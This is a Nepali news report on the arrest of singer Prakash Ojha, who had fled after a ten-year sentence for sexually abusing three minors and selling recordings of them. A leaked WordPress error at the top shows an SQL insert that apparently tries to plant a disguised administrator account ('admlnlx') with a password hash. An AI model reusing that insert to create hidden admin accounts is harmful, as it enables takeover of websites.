WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B3tdvfjWur3x5UN6u9wy/F6jPH8wiH1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-03 16:24:10', '', 'admlnlx', 'admlnlx')
काठमाडौं, माघ १४ –
‘बाउले बिहे गर्दैनन्’ बोलको चर्चित गीतका गायक प्रकाश ओझालाई प्रहरीले पक्राउ गरेको छ ।
तीन नाबालिकालाई यौन शोषण गरेको, भिडियो खिचेर पैसा कमाउने उद्देश्यसहित वेबसाइटमा प्रकाशित गरेको अभियोगमा अदालतबाट १० वर्षको जेल सजाय पाएका ओझालाई शुक्रबार प्रहरीको केन्द्रिय अनुसन्धान व्यूरो (सिआईबी)को टोलीले राजधानीको शंखमुलबाट पक्राउ गरेको हो ।उनी शुक्रबारै कारागार चलान भएका छन् ।
ओझाले २०५९ सालदेखि लगातार दुई बर्षसम्म डर त्रास देखाई तीन जना नाबालिकाहरुसँग अनैतिक सम्बन्ध राख्दै आएका थिए । पीडितले थाहा नपाउने गरी खिचेको अश्लिल तस्बीर तथा भिडियो समेत देखाई सार्वजनिक गरीदिने धम्की पटक–पटक यौन शोषन र अप्राकृतिक मैथुन गर्दै आएका थिए ।
उनले खिचेका तीं फोटोहरु वेबसाईटमा समेत राखि बेचबिखन गरी पैसा कामाउने उदेश्य समेत खोको ठहर गर्दै सर्वोच्च अदालतले पुनरावेदन अदालत विराटनगरको फैसला उल्टाएर दुईवटा मुद्दामा पाँच÷पाँच वर्ष गरी १० वर्ष कैद सुनाएको थियो ।
पीडक ओझा फैसला लगत्तै फरार भएका थिए । कुनैबेलाका चर्चित गायक र हास्य कलाकार समेत रहेका ओझा शंखमुल, काठमाडौंमा लुकिछिपि बस्दै गीत–संगीत रेकर्डिङ्गको काममा रहँदै आएको प्रहरीले जनाएको छ ।